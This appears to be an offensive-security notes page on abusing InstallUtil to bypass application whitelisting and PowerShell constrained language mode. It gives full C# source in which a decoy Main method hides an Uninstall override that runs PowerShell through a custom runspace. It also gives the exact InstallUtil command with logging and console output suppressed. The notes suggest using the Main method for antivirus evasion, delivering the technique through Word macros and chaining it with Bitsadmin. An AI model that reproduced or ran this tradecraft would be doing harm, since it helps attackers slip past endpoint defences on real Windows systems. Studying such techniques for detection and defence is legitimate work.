InstallUtil

Leverage InstallUtil to execute arbitrary C# code

We must put the code we want to execute inside either the install or uninstall methods of the installer class.

Visual Studio project:

Right click References -> Add References -> Assemblies -> Add System.Configuration.Install

Since the content of the Main method is not part of the application whitelisting bypass, we could use it for other purposes, like bypassing antivirus.

We use the custom runspace code from -> Custom Runspaces

using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;

namespace ConsoleApp2
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("This is the main method which is a decoy");
        }
    }
    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();

            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;

            String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Tools\\test.txt";
            ps.AddScript(cmd);
            ps.Invoke();
            rs.Close();
        }
    }
}

To trigger our constrained language mode bypass code, we must invoke it through InstallUtil with /logfile to avoid logging to a file /LogToConsole=false to suppress output on the console /U to trigger the Uninstall method

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Tools\Bypass.exe

It would be possible to reuse this tradecraft with Microsoft Word macros.

Combine this with -> Bitsadmin + InstallUtil

Last updated 2 years ago